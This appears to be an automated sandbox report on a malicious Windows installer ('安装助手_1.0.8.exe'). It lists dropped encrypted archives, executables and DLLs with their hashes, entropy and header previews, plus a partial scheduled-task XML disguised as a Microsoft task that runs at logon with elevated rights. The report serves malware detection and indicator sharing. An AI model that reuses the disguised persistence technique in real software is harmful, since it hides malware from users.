                              Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):74960
                              Entropy (8bit):7.99759370165655
                              Encrypted:true
                              SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                              MD5:950338D50B95A25F494EE74E97B7B7A9
                              SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                              SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                              SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                              Malicious:false
                              Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):74960
                              Entropy (8bit):7.997593701656546
                              Encrypted:true
                              SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                              MD5:059BA7C31F3E227356CA5F29E4AA2508
                              SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                              SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                              SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                              Malicious:false
                              Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):29730
                              Entropy (8bit):7.994290657653607
                              Encrypted:true
                              SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                              MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                              SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                              SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                              SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                              Malicious:false
                              Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):29730
                              Entropy (8bit):7.994290657653608
                              Encrypted:true
                              SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                              MD5:A9C8A3E00692F79E1BA9693003F85D18
                              SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                              SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                              SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                              Malicious:false
                              Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):249984
                              Entropy (8bit):7.999225319458047
                              Encrypted:true
                              SSDEEP:6144:UiZojLOtJtSMEo8gctOJw+51/DrWJEwcTvHPh4c+i2:UiG8+ME1gOO2+51/XWJDKvv2
                              MD5:4100B1A02960442D62C2A71859DE711C
                              SHA1:892354E9BF923DF486A24F3E6AF4F43D66915F98
                              SHA-256:11F926A0E453E3D5FF5D01BB29EF2C9A46CA30AB367D03210E0794D2C7616FF7
                              SHA-512:42632F833ABB0E3C0A647BE83C6C22135D1590B64AC3DE3006B1CF9D689BEDE54668A396067A2CE5AFAA900E3DD874F1899F390C133C22CC5464665766F21AAE
                              Malicious:false
                              Preview:7z..'....Umd .......@.........b.p:p3..N..C....jy......*...=..b..6.X..=Z.G._.^.K...D....j....:...|IA[..%.Pe..bQ.A......nV.p.0z.9.82y...bo..F..9....`..r..w.1.[.wR.-.4.l...).j.mL.../tY.pgHl...GZNZ.!.Gz...>..^..v..C......L.8f.%y@1.}%.Y....b..._......H.G.+.;eL..O.\d.|P.{C.".J...../_.^.M@.h..\.. w....4V..6._..u..".vj'O.e0g......m...P.J.XiS.=...Bl1.a.`....k......<.O..y.m..Wj`......&.ZY..B.. .F....=.2?.......2||Q...ODC4...In.x!.N ..Y.mR...O<...-...|.m.:..........uM.....a....8...;=..............SN_'...43.`..T.}G.......%.f..".].0...I.Y.1..v ....QH..}.\}.t.9...+h`3.\8G...O..f.C....n..d+..;<c =..t..7.I....|..}KiM(..C.l..~...H.....K..............2............+=...tg......G....Lr.)......<...........O-..s.f.$.f>.-.k..y.Fb.S.%h......^q.1.qy.n..../.h..B..+&VS...R.v.U...L..;8]..,...r..t-C..).J4...Rss>.,8{Z...[...,..J....u.$p.......].....h.1 .A...S...?....<Y..B.._..v<)..#.^4......U..|>..FP.....n.+Y.+......R|.`dn...Y.gx.+QQ...n...q...\.Ie.y~n.M7..]f..=.....-....I.NYR`
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):63640
                              Entropy (8bit):6.482810107683822
                              Encrypted:false
                              SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                              MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                              SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                              SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                              SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 9%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:data
                              Category:dropped
                              Size (bytes):4096
                              Entropy (8bit):3.344834847024567
                              Encrypted:false
                              SSDEEP:48:dXKLzDlnbL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnKwhldOVQOj6dKbKsz7
                              MD5:7F252B19B6E96247184F55570325E9FA
                              SHA1:E6D4AD432CB4864C0E1A08FB15255F7973807B3D
                              SHA-256:84460DE817C9A6637650C7ED83D15DD14836FB841FF9790D4F2D1A8D6BAAB0ED
                              SHA-512:A5741E4F5095BB24A28E5909CC659CB53535BD1E7A2555FA9D2660155F8CA80F96136E2CA589CCD2154FCF264B8FD525782B8C9752022B986F20D3F1454496EF
                              Malicious:false
                              Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvai
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                              Category:dropped
                              Size (bytes):5649408
                              Entropy (8bit):6.392614480390128
                              Encrypted:false
                              SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                              MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                              SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                              SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                              SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1940658735648508
                              Encrypted:false
                              SSDEEP:3:NlllulVmdtZ:NllUM
                              MD5:013016A37665E1E37F0A3576A8EC8324
                              SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                              SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                              SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                              Malicious:false
                              Preview:@...e................................................@..........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):6144
                              Entropy (8bit):4.720366600008286
                              Encrypted:false
                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3598848
                              Entropy (8bit):7.004949099807939
                              Encrypted:false
                              SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                              MD5:1D1464C73252978A58AC925ECE57F0FB
                              SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                              SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                              SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                              Malicious:false
                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3366912
                              Entropy (8bit):6.530548291878271
                              Encrypted:false
                              SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                              MD5:9902FA6D39184B87AED7D94A037912D8
                              SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                              SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                              SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                              Malicious:true
                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                              Process:C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):6144
                              Entropy (8bit):4.720366600008286
                              Encrypted:false
                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3598848
                              Entropy (8bit):7.004949099807939
                              Encrypted:false
                              SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                              MD5:1D1464C73252978A58AC925ECE57F0FB
                              SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                              SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                              SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                              Malicious:false
                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3366912
                              Entropy (8bit):6.530548291878271
                              Encrypted:false
                              SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                              MD5:9902FA6D39184B87AED7D94A037912D8
                              SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                              SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                              SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                              Malicious:true
                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:ASCII text, with CRLF, CR line terminators
                              Category:dropped
                              Size (bytes):406
                              Entropy (8bit):5.117520345541057
                              Encrypted:false
                              SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                              MD5:9200058492BCA8F9D88B4877F842C148
                              SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                              SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                              SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                              Malicious:false
                              Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.921235309481934
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 98.04%
                              • Inno Setup installer (109748/4) 1.08%
                              • InstallShield setup (43055/19) 0.42%
                              • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
